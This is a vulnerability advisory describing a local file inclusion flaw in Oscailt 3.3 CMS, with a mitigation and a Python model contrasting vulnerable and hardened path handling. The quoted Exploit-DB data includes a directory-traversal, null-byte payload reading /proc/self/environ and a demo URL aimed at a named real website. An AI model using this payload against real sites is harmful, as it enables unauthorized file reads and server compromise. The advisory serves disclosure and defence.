Vendor: Oscailt 3.3 CMS
By: s4r4d0@yahoo.com
CVSS: 7.5 (HIGH)
CWE: 22 (Local File Inclusion)
Product Name: Oscailt 3.3 CMS
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:oscailt:oscailt:3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Oscailt 3.3 CMS Local File Inclusion Vulnerability

Oscailt 3.3 CMS is vulnerable to Local File Inclusion because index.php does not sanitize the obj_id request parameter before using it to build a file path. An attacker can exploit the flaw by sending a crafted HTTP request with a malicious obj_id value, which allows inclusion of arbitrary files from the web server and can lead to remote code execution. The vulnerable code is in index.php, where the $cachefile variable, built by getObjectCacheIndexFile(), is passed to include_once() to load a file from the cache directory. getObjectCacheIndexFile() takes the $id parameter and concatenates it with the '.inc' extension without validating it: directory traversal sequences in $id escape the cache directory, and a trailing null byte (usable when magic_quotes is off) truncates the path so that the appended '.inc' suffix is discarded.

Mitigation:

To mitigate this vulnerability, the application should validate the obj_id parameter (for example, accept only the characters an object identifier is expected to contain) and must never let user input determine the path of the file that index.php includes.
Source

Exploit-DB raw data:

[0] Oscailt 3.3 CMS 
[0] Download: http://sourceforge.net/projects/oscailt/
[0] Bug: Local File Inclusion in index.php file !
[0] Author: s4r4d0@yahoo.com
[0] Team: Fatal Error
[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] DEMO: http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!!
[0] Made in Brazil - SP
[0] Source Code: 
# SecurityReason Note :
#
# The option "Use Friendly URL's" in configuration must be set off
#
# Vulnerable Code in index.php :
#
# $target_indyobject_id = getRequestTargetObjectID();
# ...
# if(!$use_live)
# {
#   $cachefile = getObjectCacheIndexFile($target_indyobject_id);
#   if(file_exists($cachefile))
#   {
#      include_once($cachefile);
#   }
#
# in function getObjectCacheIndexFile() we have ...
#
# function getObjectCacheIndexFile($id)
# {
#   $dir = getObjectCacheDir($id);
#   $f = $id.'.inc';
#   return $dir.$f;
# }
# 
# As we can see, $cachefile tries to include an .inc file in the cache dir.
#
# magic_quotes = Off // to use %00 null byte
#
# - sp3x
#

[0] Reference: http://securityreason.com/exploitalert/7422
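To make the description and the mitigation above concrete, here is an added Python model (not Oscailt's own code) of the index.php path construction next to a hardened version. It assumes a fixed cache directory standing in for getObjectCacheDir(), a numeric obj_id format, and a PHP build where a NUL byte in the file name truncates it when the include opens the file.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Assumed layout for this example (not taken from the Oscailt source):
# the directory getObjectCacheDir() resolves to, and the format of a valid obj_id.
CACHE_DIR = "/var/www/oscailt/cache"
VALID_ID = re.compile(r"[0-9]+")


def decode_obj_id(raw_query_value: str) -> str:
    """URL-decode obj_id the way PHP populates $_GET; '%00' becomes a real NUL byte."""
    return unquote(raw_query_value)


def vulnerable_cache_index_file(obj_id: str) -> str:
    """Model of getObjectCacheIndexFile(): $dir . $id . '.inc' with no validation.

    The file name reaches the C library as a NUL-terminated string, so everything
    after a NUL byte (including the appended '.inc') is ignored when the include
    opens the file. Returns the path the operating system would actually open.
    """
    path = CACHE_DIR + "/" + obj_id + ".inc"   # plain concatenation, as in the CMS
    nul = path.find("\x00")
    if nul >= 0:
        path = path[:nul]                       # the '.inc' suffix is silently lost
    return os.path.normpath(path)               # '..' segments are resolved by the OS


def hardened_cache_index_file(obj_id: str) -> Optional[str]:
    """Hardened version: allow-list the identifier, then confirm the resolved path
    is still inside CACHE_DIR. Returns None when the request must be rejected."""
    if VALID_ID.fullmatch(obj_id) is None:      # rejects '/', '..', NUL, anything non-numeric
        return None
    candidate = os.path.normpath(os.path.join(CACHE_DIR, obj_id + ".inc"))
    if os.path.commonpath([CACHE_DIR, candidate]) != CACHE_DIR:
        return None                             # defence in depth: never leave the cache dir
    return candidate


if __name__ == "__main__":
    # Constructed inputs: a benign id and the advisory's traversal-plus-null-byte pattern.
    for raw in ("12", "/../../../../../../../../../../proc/self/environ%00"):
        obj_id = decode_obj_id(raw)
        print(f"{raw!r}: vulnerable -> {vulnerable_cache_index_file(obj_id)}, "
              f"hardened -> {hardened_cache_index_file(obj_id)}")
```

The vulnerable model resolves the advisory's obj_id to a file outside the cache directory with no '.inc' suffix, while the hardened function rejects it before any path is built.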